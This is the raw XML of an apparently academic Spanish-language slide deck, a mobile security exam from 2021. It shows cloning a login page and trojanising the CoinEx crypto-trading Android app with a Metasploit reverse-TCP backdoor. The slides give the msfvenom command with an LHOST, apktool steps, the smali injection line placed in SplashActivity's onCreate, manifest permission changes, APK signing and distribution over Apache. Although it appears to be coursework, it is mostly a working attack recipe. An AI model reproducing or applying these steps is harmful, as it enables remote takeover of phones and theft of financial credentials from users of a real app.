              <a:t>fuentes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 y la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> se lo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subió</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>githug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https://github.com/gusecuador/mysampleapp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>La URL de las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clonada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> es: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://mysterious-bastion-81992.herokuapp.com/index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ,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index,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olvido</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>contrasena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AC5-E8AF-4085-99D2-FDD3CCD7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B27-8913-4D61-8F2A-AB7D6FD3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9118" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Se probó realizar la tarea de embeber de manera automática con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" i="1" dirty="0" err="1"/>
              <a:t>TheFatRat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC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DF7CE-DD90-4958-ACCD-996C6481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77" y="1256506"/>
            <a:ext cx="5506097" cy="501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CC23F-DC05-42CA-99CD-A71EEF34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3114278"/>
            <a:ext cx="4257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5213-9C83-4C44-A88A-AF304D18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6CB29-1451-4F62-9311-E54012A5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4173"/>
            <a:ext cx="5164943" cy="36841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F7A02-A78A-4009-B402-A77305ECBE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745343" y="1970843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* Se introduce la dirección IP, el puerto y la ubicación del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> original en este caso de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t> en su versión 3.3.0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DFED1-1C0A-479D-8D87-0D6D0DE3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59" y="2894173"/>
            <a:ext cx="5622141" cy="3684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FC2AAA-BCAE-4B01-8B72-9059BBEC2F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188859" y="1343025"/>
            <a:ext cx="554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Elegimos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>reverse_tcp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Luego </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t>Use Backdoor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> 0.2.4a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2132-2B4A-48DD-B87F-22741DE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5194-EA02-473B-A359-F850C6F9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s-EC" dirty="0"/>
              <a:t>Elegir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>Merge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1"/>
              <a:t>shuffle</a:t>
            </a:r>
            <a:endParaRPr lang="es-EC" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Empezará a generarse nueva </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk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7037F-5371-46DF-BB14-5BBA122F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4" y="3178205"/>
            <a:ext cx="5576885" cy="3575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BDA36-CE51-4115-B809-19A2C014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93" y="1257903"/>
            <a:ext cx="5162550" cy="54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312-0640-4903-81CF-00E7CA6D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r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de forma manual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C41D-365A-4633-9132-34B97A1B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472" y="1825625"/>
            <a:ext cx="3550328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Generar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> un APK malware con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>msfvenom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commando: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> -p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> LHOST=192.168.1.5 LPORT:4444 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>msf.apk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/>
              <a:t>, se genera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i="1" dirty="0"/>
              <a:t>/root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Desmontar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>archivos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> APK malware y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>el</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>mediante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>comandos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1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>msf.apk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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1"/>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t> d coinex-release-3.3.0.apk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>SE DECIDIÓ PARA ESTA ENTREGA COCINAR EL APK DE MANERA MANUAL INCLUYENDO EL BACKDOOR.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C1D2-F7A8-4B6E-A8D9-889BD8AF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" y="1690688"/>
            <a:ext cx="6343650" cy="1115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9CE3A-6F4C-40CE-871A-0C7D9331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8" y="2882901"/>
            <a:ext cx="6343650" cy="1908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A0557-24F3-43DF-B9EB-5B7263A6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9" y="4869509"/>
            <a:ext cx="6343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1F5C-1138-4B8D-85B9-E7EB91F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r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de forma manual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B4FF-A9D0-49EF-91DE-56DAED92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00" y="1825625"/>
            <a:ext cx="5032899" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>Copiamos carpeta “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>” del malware a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" dirty="0"/>
              <a:t>  legal mediante:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-EC" i="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" sz="1400" i="1" dirty="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" sz="1400" i="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" sz="1400" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-EC" sz="1600" i="1" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> - ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> | (cd ../coinex-release-3.3.0; tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xpf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> - ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Ubicado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ruta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>descomprimida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> a la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>ruta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>/trade/modules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archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>SplashActivity.smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>agregar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> la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línea</a:t>
            </a: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después</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> del 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b="1" dirty="0" err="1"/>
              <a:t>onCreate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>() para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>meterpreter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400" i="1" dirty="0"/>
              <a:t>invoke-static {p0}, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1"/>
              <a:t>Lcom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>/stage/Payload;-&gt;start(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0" err="1"/>
              <a:t>Landroid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>/content/Context;)V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9530A-4667-406E-84B5-23D8D692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20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EC03C-4314-45B7-B718-ACD6F87C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7" y="2220300"/>
            <a:ext cx="5527784" cy="150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D9F88-92D1-49D2-A47F-16AA8295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5" y="3761603"/>
            <a:ext cx="5486400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263C2-C67A-4193-A14E-346605BB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17" y="4683125"/>
            <a:ext cx="5527783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9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88B4-486E-440B-8149-BE665DE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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Embebiendo backdoor en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> original de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>coinex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-EC" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de forma manual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6147-B544-4EA9-9F7C-6B52C195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08" y="1825625"/>
            <a:ext cx="4757691" cy="3136900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Agregar permisos al archivo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AndroidManifest.xml” de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> original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archivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malware:</a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>coinex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> :  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err="1"/>
              <a:t>keytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>genkey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> -v -keystore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>howto.keystore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> -alias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>howto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>keyalg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> RSA -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>keysize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> 2048 -validity 10000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CB010-AACF-48CB-9A9A-3EEAB740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1558133"/>
            <a:ext cx="4557712" cy="2818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35BAA-8449-4BB2-AD43-D0F540F7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4467599"/>
            <a:ext cx="5553075" cy="2204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8DD6B-6D1B-4F7A-A65F-B742E763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108" y="4962525"/>
            <a:ext cx="4986292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2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1049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EXAMEN DE SEGURIDAD EN DISPOSITIVOS MÓVILES</vt:lpstr>
      <vt:lpstr>Clonado de páginas</vt:lpstr>
      <vt:lpstr>Clonado de páginas</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex de forma manual</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex de forma manual</vt:lpstr>
      <vt:lpstr>Embebiendo backdoor en apk original de coinex de forma manual</vt:lpstr>
      <vt:lpstr>Permisos a agregar a apk coinex de manera manual.</vt:lpstr>
      <vt:lpstr>Se realizará inclusión de RAT en app coinex versión 3.3.0</vt:lpstr>
      <vt:lpstr>Firmar y Generar certificado a la apk de coinex incluido el RAT</vt:lpstr>
      <vt:lpstr>Preparando sitio en localhost de Kali Linux con apache2</vt:lpstr>
      <vt:lpstr>Preparando sitio en localhot de Kali Linux con apache2</vt:lpstr>
      <vt:lpstr>Instalar En celular</vt:lpstr>
      <vt:lpstr>Captura mediante app coinex embebida rat</vt:lpstr>
      <vt:lpstr>Captura mediante app coinex embebida RAT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DE SEGURIDAD EN DISPOSITIVOS MÓVILES</dc:title>
  <dc:creator>GUSTAVO ASQUI YANEZ</dc:creator>
  <cp:lastModifiedBy>GUSTAVO ASQUI YANEZ</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-03T18:14:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-09T04:43:12Z</dcterms:modified>
</cp:coreProperties>
</file>